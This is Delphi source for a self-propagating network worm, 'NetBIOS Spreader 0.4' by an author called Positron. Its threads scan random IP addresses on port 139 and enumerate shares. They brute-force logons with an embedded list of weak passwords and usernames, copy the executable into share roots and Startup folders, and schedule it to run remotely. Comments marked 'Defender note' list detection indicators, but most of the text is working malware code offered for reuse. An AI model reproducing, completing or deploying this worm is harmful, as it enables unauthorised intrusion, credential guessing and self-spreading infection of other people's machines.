
  1. {***********************************************************************}
  2. {  NetBIOS Spreader 0.4 by Positron                                     }
  3. {  URL: http://www.virustrading.com/positron                            }
  4. {                                                                       }
  5. {  Tested on Windows XP. Write me if you find any error in the code!    }
  6. {                                                                       }
  7. {  If you use this source then you must credit Positron. You can freely }
  8. {  use this source in NON-Commercial applications.                      }
  9. {                                                                       }
  10. {  Thanks goes to r-22                                                  }
  11. {                                                                       }
  12. {  Notice:                                                              }
  13. {    You can use ACLUnits and KOL System replacement units if you want  }
  14. {    to make its compiled size smaller.                                 }
  15. {***********************************************************************}
  16. {  History:                                                             }
  17. {     08/08/2003 - First public version (v0.3)                          }
  18. {     10/09/2003 - Some optimalisations (v0.4)                          }
  19. {***********************************************************************}
  20.  
  21. UNIT NetBIOS;
  22.  
  23. INTERFACE
  24.  
  25. {$DEFINE Debug}
  26.  
  27. PROCEDURE StartNetBIOS;
  28.  
  29. IMPLEMENTATION
  30.  
  31. USES
  32.   Windows, WinSock, WinInet, main;
  33.  
VAR
  // Read by the Debug branch of InfectNetBIOS only; nothing in this unit assigns it.
  n_report : Boolean;
  // netapi32.dll entry points, resolved at runtime by InitNETAPIFunctions rather than
  // imported statically.  NT builds use the wide-char NetShareEnum and NetApiBufferFree;
  // OLD_NetShareEnum is the ANSI form used when IsNTBasedOS is False.
  lpNetApiBufferFree  : FUNCTION(VAR Buffer) : DWORD;STDCALL;
  lpNetRemoteTOD      : FUNCTION(UNCServerName:pChar;BufferPtr:pByte) : DWORD;STDCALL;
  lpNetScheduleJobAdd : FUNCTION(ServerName:pChar;Buffer:pByte;VAR JobID:DWORD) : DWORD;STDCALL;
  OLD_NetShareEnum    : FUNCTION(pszServer:pChar;sLevel:SmallInt;VAR Bufptr;cbBuffer:Cardinal;VAR pcEntriesRead,pcTotalAvail:Cardinal) : DWORD; STDCALL;
  NT_NetShareEnum     : FUNCTION(ServerName:pWideChar;Level:DWORD;VAR Bufptr;Prefmaxlen:DWORD;VAR EntriesRead,TotalEntries,resume_handle:DWORD) : DWORD; STDCALL;

CONST
  // Marker strings passed in the szIPAddr parameter of GetRandomIP to step the
  // last octet of the current address instead of drawing a new random one.
  PREVIOUS_IP              = '2';
  NEXT_IP                  = '1';
  // Win32 / NetAPI status codes declared locally because no NetAPI unit is used.
  NERR_SUCCESS             = 0;
  // StartNetBIOS creates MAX_NB_THREAD+1 scanner threads.
  MAX_NB_THREAD            = 50;
  // Upper array bounds of the two credential lists below.
  MAX_USERNAME             = 4;
  ERROR_ACCESS_DENIED      = 5;
  // NetShareEnum share type that InfectSharedResource never touches (printer queues).
  STYPE_PRINTQ             = 1;
  ERROR_INVALID_PASSWORD   = 86;
  MAX_PASSWORD             = 101;
  ERROR_NO_NET_OR_BAD_PATH = 1203;
  ERROR_LOGON_FAILURE      = 1326;
  // Plaintext dictionary tried pairwise with lpszUserName by InfectSharedResource
  // through WNetAddConnection2.  Defender note: these literals are embedded verbatim
  // in the binary and make a straightforward static signature; on the wire the same
  // list shows up as a burst of failed share logons from a single source.
  lpszPassword  : ARRAY [0..MAX_PASSWORD] OF STRING = (
        '','1234','password','6969','harley','123456','golf','pussy','mustang',
        '1111','shadow','1313','fish','5150','7777','qwerty','baseball','2112',
        'letmein','12345678','12345','ccc','admin','Admin','Password','1','12',
        '123','1234567','123456789','654321','54321','111','000000','abc','pw',
    '11111111','88888888','pass','passwd','database','abcd','abc123','pass',
        'sybase','123qwe','server','computer','Internet','super','123asd','0',
        'ihavenopass','godblessyou','enable','xp','2002','2003','2600','alpha',
        '110','111111','121212','123123','1234qwer','123abc','007','a','aaa',
        'patrick','pat','administrator','root','sex','god','foobar','secret',
        'abc','test','test123','temp','temp123','win','pc','asdf','oracle''pwd',
        'qwer','yxcv','zxcv','home','xxx','owner','login','Login','pw123',
        'love','mypc','mypc123','admin123','mypass','mypass123','901100');
  // Account names tried for each password; index 0 (empty user) is the only one
  // used on non-NT hosts.
  lpszUserName  : ARRAY [0..MAX_USERNAME] OF STRING = (
        '','Guest','Administrator','Owner','Root');
  69.  
  70. //------------------------------------------------------------------------------
  71. FUNCTION IntToStr(I:Integer) : STRING;
  72. BEGIN
  73.   Str(I,Result);
  74. END;
  75.  
  76. //------------------------------------------------------------------------------
  77. FUNCTION ExtractFileName(CONST FileName:ShortString) : ShortString;
  78. VAR
  79.   I : Integer;
  80. BEGIN
  81.   I:=Length(FileName);
  82.   WHILE (I>=1)AND NOT(FileName[I] IN ['\',':']) DO Dec(I);
  83.   Result:=Copy(FileName,I+1,255);
  84.   IF Result[0]>#0 THEN IF Result[Ord(Result[0])]=#0 THEN Dec(Result[0]);
  85. END;
  86.  
  87. //------------------------------------------------------------------------------
  88. FUNCTION DirectoryExists(CONST Dir:STRING) : BOOL;
  89. VAR
  90.   Attr : DWORD;
  91. BEGIN
  92.   Attr:=GetFileAttributes(pChar(Dir));
  93.   Result:=(Attr<>$FFFFFFFF)AND(Attr AND FILE_ATTRIBUTE_DIRECTORY=FILE_ATTRIBUTE_DIRECTORY);
  94. END;
  95.  
  96. //------------------------------------------------------------------------------
  97. FUNCTION IsNTBasedOS : BOOL;
  98. VAR
  99.   verInfo : TOSVersionInfo;
  100. BEGIN
  101.   Result:=False;
  102.   verInfo.dwOSVersionInfoSize:=SizeOf(TOSVersionInfo);
  103.   GetVersionEx(verInfo);
  104.   IF verInfo.dwPlatformId=VER_PLATFORM_WIN32_NT THEN Result:=True;
  105. END;
  106.  
  107. //------------------------------------------------------------------------------
PROCEDURE NetRemoteExecute(szServer,szLocation:STRING);
// Asks the remote host szServer to run szLocation as a scheduled (AT) job.
//   szServer   - UNC host name such as '\\a.b.c.d' (szRemoteUNC at the call site
//                in InfectSharedResource)
//   szLocation - command line for the job ('Xi.exe' at the only call site)
// Flow: NetRemoteTOD fetches the target's clock, two minutes are added, and
// NetScheduleJobAdd submits the command for that time.  Both routines are the
// netapi32.dll pointers set up by InitNETAPIFunctions; the TOD buffer is
// released with NetApiBufferFree on NT.  Nothing is reported back to the caller.
// Defender note: a freshly written Xi.exe in a share root followed by an AT job
// created on the same host is the observable artefact of this routine.
TYPE
  // Local copies of the NetAPI TIME_OF_DAY_INFO and AT_INFO layouts (no NetAPI unit is used).
  PTIME_OF_DAY_INFO = ^TTIME_OF_DAY_INFO;
  TTIME_OF_DAY_INFO = RECORD
    tod_elapsedt    : DWORD;
    tod_msecs       : DWORD;
    tod_hours       : DWORD;
    tod_mins        : DWORD;
    tod_secs        : DWORD;
    tod_hunds       : DWORD;
    tod_timezone    : LongInt;
    tod_tinterval   : DWORD;
    tod_day         : DWORD;
    tod_month       : DWORD;
    tod_year        : DWORD;
    tod_weekday     : DWORD;
  END;
  AT_INFO           = RECORD
    JobTime         : DWORD;
    DaysOfMonth     : DWORD;
    DaysOfWeek      : UCHAR;
    Flags           : UCHAR;
    Command         : pWideChar;
  END;
VAR
  JobID        : DWORD;
  dwRemoteTime : DWORD;                  // job time in ms since midnight, remote local time
  dwReturn     : DWORD;
  NetAT        : AT_INFO;
  wcCmd        : PWideChar;
  wcServer     : PWideChar;
  lpNetTOD     : PTIME_OF_DAY_INFO;      // allocated by NetRemoteTOD, freed below on NT
BEGIN
  GetMem(wcCmd,1024+1);
  GetMem(wcServer,256+1);
  lpNetTOD:=NIL;
  {$IFDEF Debug}
    //writeln('[EXECUTE] ADDRESS: '+szServer+' Location: '+szLocation);
  {$ENDIF}
  StringToWideChar(szServer,wcServer,SizeOf(wcServer)+1);
  StringToWideChar(szLocation,wcCmd,SizeOf(wcCmd)+1);
  dwReturn:=lpNetRemoteTOD(pChar(wcServer),@lpNetTOD);
  IF dwReturn=NERR_Success THEN BEGIN
    //* add 2 minutes to current time
    // Remote clock (UTC fields) converted to ms, then shifted by tod_timezone
    // (minutes) when the host reports one; -1 is treated as "unknown".
    dwRemoteTime:=(lpNetTOD.tod_hours*3600+lpNetTOD.tod_mins*60+lpNetTOD.tod_secs)*1000+lpNetTOD.tod_hunds*10;
    IF lpNetTOD.tod_timezone<>-1 THEN dwRemoteTime:=dwRemoteTime-lpNetTOD.tod_timezone*60000;
    dwRemoteTime:=dwRemoteTime+(2*60)*1000;                                     //* add two minutes to current remote time
    IF IsNTBasedOS THEN lpNetApiBufferFree(lpNetTOD);
    FillChar(NetAT,0,SizeOf(NetAT));
    NetAT.JobTime:=dwRemoteTime;
    NetAT.Command:=@wcCmd;
    dwReturn:=lpNetScheduleJobAdd(pChar(wcServer),@NetAT,JobID);
    {$IFDEF Debug}
      //writeln('[ERROR] NetScheduleJobAdd(): '+IntToStr(dwReturn));
    {$ENDIF}
  END;
  FreeMem(wcCmd);
  FreeMem(wcServer);
END;
  167.  
  168. //------------------------------------------------------------------------------
FUNCTION InfectSharedResource(szRemoteName,szRemoteUNC:STRING) : BOOL;
// Tries to map the share szRemoteUNC+'\'+szRemoteName with every user/password
// pair from lpszUserName x lpszPassword (on non-NT hosts only the first, empty,
// pair).  When WNetAddConnection2 succeeds the running executable (ParamStr(0))
// is copied to the share root as 'Xi.exe' and, on NT, NetRemoteExecute is asked
// to schedule it; otherwise it is copied as 'Setup.exe' into whichever of the
// three Startup folders in Path[] exists.  The mapping is cancelled with
// WNetCancelConnection before the next attempt.
//   szRemoteName - share name as returned by NetShareEnum
//   szRemoteUNC  - '\\a.b.c.d' host prefix from EnumShare
// Returns True after the root-directory copy succeeds.
// Defender note: Xi.exe in a share root, Setup.exe in an All Users Startup
// folder, and up to 5 x 102 logon attempts per share from one source are the
// host- and network-side indicators of this routine.
LABEL
  Next;
VAR
  I             : DWORD;
  dwRet         : DWORD;
  szLocation    : STRING;
  szFullPath    : STRING;
  bCopy2        : BOOL;                  // True once the root-directory copy has been made
  nK            : Integer;               // index into lpszUserName
  nL            : Integer;               // index into lpszPassword
  nN            : Integer;
  lpszFileName  : pWideChar;
  NetResource   : TNetResource;
  NetResource2  : TNetResource;
  MaxUserName   : WORD;
  MaxPassword   : WORD;
CONST
  PathSize      = 4;
  // Path[1] is the share root; Path[2..4] are Startup folders of different Windows versions.
  Path          : ARRAY[1..PathSize] OF STRING =(
                      '\',
                      '\Documents and Settings\All Users\Start Menu\Programs\Startup\',
                      '\WINDOWS\Start Menu\Programs\Startup\',
                      '\WINNT\Profiles\All Users\Start Menu\Programs\Startup\');
BEGIN
  Result:=False;
  bCopy2:=False;
  szRemoteName:=szRemoteUNC+'\'+szRemoteName;
  NetResource.dwType:=RESOURCETYPE_DISK;
  NetResource.lpLocalName:=NIL;
  NetResource.lpRemoteName:=pChar(szRemoteName);
  NetResource.lpProvider:=NIL;
  lpszFileName:=NIL;
  GetModuleFileName(GetModuleHandle(0),pChar(szFullPath),Length(szFullPath));
  lpszFileName:=pWideChar(string(ExtractFilename(szFullPAth)));
  // Full credential sweep on NT; a single empty user/password pair elsewhere.
  IF IsNTBasedOS THEN BEGIN
    MaxUserName:=MAX_USERNAME;
    MaxPassword:=MAX_PASSWORD;
  END ELSE BEGIN
    MaxUserName:=0;
    MaxPassword:=0;
  END;
  FOR nK:=0 TO MaxUserName DO BEGIN
    FOR nL:=0 TO MaxPassword DO BEGIN
      {$IFDEF Debug}
//    sendmsg('[SCANNING] Remote Path: '+NetResource.lpRemoteName+' User: '+lpszUserName[nK]+' Pass: '+lpszPassWord[nL]);
      {$ENDIF}
      dwRet:=WNetAddConnection2(NetResource,pChar(lpszPassword[nL]),pChar(lpszUserName[nK]),0);
      {$IFDEF Debug}
      // The early Exit on ERROR_NO_NET_OR_BAD_PATH only exists when Debug is defined.
      CASE dwRet OF
//        ERROR_ACCESS_DENIED      : //writeln('Error: Acces Denied');
//        ERROR_INVALID_PASSWORD   : //writeln('Error: Invalid Password');
        ERROR_NO_NET_OR_BAD_PATH : Exit;
//        ERROR_LOGON_FAILURE      : //writeln('Logon failure: unknown user name or bad password.');
//        ELSE //writeln('Error Code: '+IntToStr(dwRet));
      END;
      //writeln;
      {$ENDIF}
      IF dwRet=NO_ERROR THEN BEGIN
        FOR I:=1 TO PathSize DO BEGIN
          IF I=1 THEN BEGIN                                                     // Copy file to root dir of shared resource
            IF DirectoryExists(szRemoteName)AND(NOT BCopy2) THEN BEGIN
              bCopy2:=CopyFile(pChar(ParamStr(0)),pChar(szRemoteName+'\Xi.exe'),False);
              IF NOT bCopy2 THEN GOTO Next;
              Result:=True;
              IF IsNTBasedOS THEN NetRemoteExecute(szRemoteUNC,'Xi.exe');
              {$IFDEF Debug}
              sendmsg('[COPYED] From: '+ParamStr(0)+' To: '+NetResource.lpRemoteName+'\Xi.exe');
              {$ENDIF}
            END;
          END ELSE BEGIN                                                        // Copy files to startup dirs
            IF DirectoryExists(NetResource.lpRemoteName+Path[I]) THEN BEGIN
              IF CopyFile(pChar(ParamStr(0)),pChar(szRemoteName+Path[I]+'Setup.exe'),False) THEN BEGIN
                {$IFDEF Debug}
                 sendmsg('[COPYED] From: '+ParamStr(0)+' To: '+NetResource.lpRemoteName+Path[I]+'Setup.exe');
                {$ENDIF}
                FOR nN:=0 TO 20 DO IF WnetCancelConnection(NetResource.lpRemoteName,True)=NO_ERROR THEN Exit;
                Result:=True;
                Exit;
              END;
            END;
          END;
        END;
        Next:
        // Drop the mapping (up to 21 tries) before the next credential pair.
        FOR nN:=0 TO 20 DO IF WnetCancelConnection(NetResource.lpRemoteName,True)=NO_ERROR THEN Break;
        {$IFDEF Debug}
//          writeln('[DISCONNECTED] Remote Path: '+NetResource.lpRemoteName+#13#10+
//                  ' User: '+lpszUserName[nK]+#13#10+
//                  ' Pass: '+lpszPassword[nL]);
        {$ENDIF}
      END;
    END;
  END;
END;
  263.  
  264. //------------------------------------------------------------------------------
FUNCTION EnumShare(szRemoteAddr:STRING) : BOOL;
// Lists the shares exposed by szRemoteAddr ('\\a.b.c.d', built by InfectNetBIOS)
// with level-1 NetShareEnum and hands every share that is not a printer queue
// (STYPE_PRINTQ) to InfectSharedResource.
//   NT    : wide-char NT_NetShareEnum with a resume handle, looping while the
//           call returns ERROR_MORE_DATA; the buffer is released with NetApiBufferFree.
//   Win9x : the ANSI OLD_NetShareEnum form, which has no resume handle.
// Returns the value of the last InfectSharedResource call, False when none was made.
// Defender note: share enumeration against every host that answers on TCP/139
// is the step that precedes the credential sweep in InfectSharedResource.
TYPE
  // Local SHARE_INFO_1 layout; lpCurrentInfo is advanced record by record below.
  Share_INFO_1   = RECORD
    shi1_netname : PWideChar;
    shi1_type    : DWORD;
    shi1_remark  : LPTSTR;
  END;
  LPShare_INFO_1 =^Share_INFO_1;
VAR
  dwK            : DWORD;
  hResume        : DWORD;                // NetShareEnum resume handle (NT only)
  dwReturn       : DWORD;
  dwReadEntires  : DWORD;
  dwTotalEntires : DWORD;
  szShareName    : STRING;
  wcRemoteAddr   : pWideChar;
  lpShareInfo    : LPSHARE_INFO_1;       // buffer allocated by NetShareEnum
  lpCurrentInfo  : LPSHARE_INFO_1;
BEGIN
  Result:=False;
  GetMem(wcRemoteAddr,MAX_PATH+10);
  StringToWideChar(szRemoteAddr,wcRemoteAddr,MAX_PATH+10);
  hResume:=0;
  REPEAT
    lpShareInfo:=NIL;
    IF IsNTBasedOS THEN dwReturn:=NT_NetShareEnum(wcRemoteAddr,1,lpShareInfo,8192,dwReadEntires,dwTotalEntires,hResume)
     ELSE dwReturn:=OLD_NetShareEnum(pChar(wcRemoteAddr),1,lpShareInfo,8192,dwReadEntires,dwTotalEntires);
    IF(dwReturn<>ERROR_MORE_DATA)AND(dwReturn<>ERROR_SUCCESS) THEN Break;
    lpCurrentInfo:=lpShareInfo;
    FOR dwK:=0 TO dwReadEntires-1 DO BEGIN
      szShareName:=lpCurrentInfo.shi1_netname;
      {$IFDEF Debug}
        //writeln('[SHARE] Server: '+szRemoteAddr+' Share: '+szShareName);
      {$ENDIF}
      IF lpcurrentinfo.shi1_type<>STYPE_PRINTQ THEN Result:=InfectSharedResource(szShareName,szRemoteAddr);
      Inc(lpCurrentInfo);
    END;
    IF IsNTBasedOS THEN lpNetAPIBufferFree(lpShareInfo);
  UNTIL dwReturn<>ERROR_MORE_DATA;
  FreeMem(wcRemoteAddr);
END;
  306.  
  307. //------------------------------------------------------------------------------
PROCEDURE GetRandomIP(VAR szIPAddr:STRING;VAR NIPAddrA,NIPAddrB,NIPAddrC,NIPAddrD:WORD);
// Produces the next dotted-quad target in szIPAddr; the four octets live in the
// VAR parameters so the caller can carry them between calls.  szIPAddr on entry:
//   ''          - draw four fresh random octets, each in 1..254
//   NEXT_IP     - advance the last octet by one (only while it is below 255)
//   PREVIOUS_IP - move the last octet back by two (only while it is above 2)
//   anything else leaves the octets unchanged and merely re-formats them.
// Defender note: the address space is walked at random, so the scan shows up as
// TCP/139 probes to unrelated addresses rather than a sequential sweep.
BEGIN
  IF szIPAddr='' THEN BEGIN
    nIPAddrA:=Random(254)+1;
    nIPAddrB:=Random(254)+1;
    nIPAddrC:=Random(254)+1;
    nIPAddrD:=Random(254)+1;
  END;
  IF(szIPAddr=NEXT_IP)AND(nIPAddrD<255)THEN Inc(nIPAddrD);
  IF(szIPAddr=PREVIOUS_IP)AND(nIPAddrD>2)THEN Dec(nIPAddrD,2);
  szIPAddr:=IntToStr(nIPAddrA)+'.'+IntToStr(nIPAddrB)+'.'+IntToStr(nIPAddrC)+'.'+IntToStr(nIPAddrD);
END;
  320.  
  321. //------------------------------------------------------------------------------
PROCEDURE InfectNetBIOS;
// Scanner thread body; StartNetBIOS starts MAX_NB_THREAD+1 of these.  Loops
// forever: asks GetRandomIP for an address, opens a TCP connection to port 139,
// and when the connect succeeds closes the socket and calls EnumShare for that
// host.  Each iteration ends with Sleep(512).
// The marker written to szIPAddr at the top of the loop is what GetRandomIP
// consumes: after a hit (R=True) the NEXT_IP / PREVIOUS_IP markers are passed
// on, otherwise '' requests a fresh random address.
// Defender note: the network footprint is a stream of short-lived TCP/139
// connection attempts to random addresses, roughly two per second per thread.
VAR
  szIPAddr      : STRING;
  Sock          : TSocket;
  SockAddr      : TSockAddrIn;
  IPA           : WORD;                  // current octets, kept across GetRandomIP calls
  IPB           : WORD;
  IPC           : WORD;
  IPD           : WORD;
  R             : BOOL;                  // result of the previous EnumShare call
BEGIN
  R:=False;
  szIPAddr:='';
  WHILE True DO BEGIN
    IF R=True THEN BEGIN
      IF szIPAddr=PREVIOUS_IP THEN szIPAddr:='' ELSE BEGIN
        IF szIPAddr=NEXT_IP THEN szIPAddr:=PREVIOUS_IP;
        IF szIPAddr='' THEN szIPAddr:=NEXT_IP;
      END;
    END ELSE szIPAddr:='';
    GetRandomIP(szIPAddr,IPA,IPB,IPC,IPD);
    {$IFDEF Debug}
    if n_report then
    sendmsg('[SCANNING] Addres: '+szIPAddr+' Port: 139');
    {$ENDIF}

    // Plain blocking connect to the NetBIOS session port.
    Sock:=Socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    SockAddr.sin_family:=AF_INET;
    SockAddr.sin_port:=htons(139);
    SockAddr.sin_addr.S_addr:=inet_addr(pChar(szIPAddr));
    IF connect(Sock,SockAddr,SizeOf(SockAddr))<>SOCKET_ERROR THEN BEGIN
      {$IFDEF Debug}
      //writeln('[SCANNED] Address: '+szIPAddr+' Port: 139 State: Open');
      {$ENDIF}
      CloseSocket(Sock);
      R:=EnumShare('\\'+szIPAddr);
    END ELSE BEGIN
      {$IFDEF Debug}
        //writeln('[SCANNED] Address: '+szIPAddr+' Port: 139 State: Closed');
      {$ENDIF}
      CloseSocket(Sock);
    END;

    Sleep(512);
  END;
END;
  368.  
  369. //------------------------------------------------------------------------------
PROCEDURE InitNETAPIFunctions;
// Resolves the netapi32.dll routines used by this unit at runtime with
// LoadLibrary/GetProcAddress and stores them in the unit-level function
// pointers.  NT gets the wide-char NetShareEnum plus NetApiBufferFree; other
// platforms only the ANSI NetShareEnum.  The module handle is never released.
// Defender note: because the names are looked up dynamically they do not appear
// in the import table; the literals 'netapi32.dll', 'NetRemoteTOD',
// 'NetScheduleJobAdd', 'NetShareEnum' and 'NetApiBufferFree' are what static
// inspection of the binary will show.
VAR
  NETAPI32 : Thandle;
BEGIN
  NETAPI32:=LoadLibrary('netapi32.dll');
  lpNetRemoteTOD:=GetProcAddress(NETAPI32,'NetRemoteTOD');
  lpNetScheduleJobAdd:=GetProcAddress(NETAPI32,'NetScheduleJobAdd');
  IF IsNTBasedOS THEN BEGIN
    NT_NetShareEnum:=GetProcAddress(NETAPI32,'NetShareEnum');
    lpNetAPIBufferFree:=GetProcAddress(NETAPI32,'NetApiBufferFree');
  END ELSE OLD_NetShareEnum:=GetProcAddress(NETAPI32,'NetShareEnum');
END;
  382.  
  383. //------------------------------------------------------------------------------
PROCEDURE StartNetBIOS;
// The unit's only exported entry point.  Blocks until InternetGetConnectedState
// reports connectivity, seeds the RNG used by GetRandomIP, resolves the
// netapi32 routines, starts MAX_NB_THREAD+1 InfectNetBIOS threads and then
// parks the calling thread in a message loop so the process stays alive.
// Does not return while GetMessage keeps delivering messages.
// Defender note: a process that polls InternetGetConnectedState and then opens
// ~51 scanner threads is the startup behaviour to look for in a sandbox trace.
VAR
  Msg      : TMsg;
  I        : WORD;
  ThreadID : DWORD;
BEGIN
  WHILE NOT InternetGetConnectedState(NIL,0) DO Sleep(1000);                    //Wait for Internet connection
  Randomize;
  InitNETAPIFunctions;
  FOR I:=0 TO MAX_NB_THREAD DO CreateThread(NIL,0,@InfectNetBios,NIL,I,ThreadID);
  WHILE GetMessage(Msg,0,0,0) DO DispatchMessage(Msg);                          //Make application resident
END;
  396.  
  397. END.
  398.  
  399.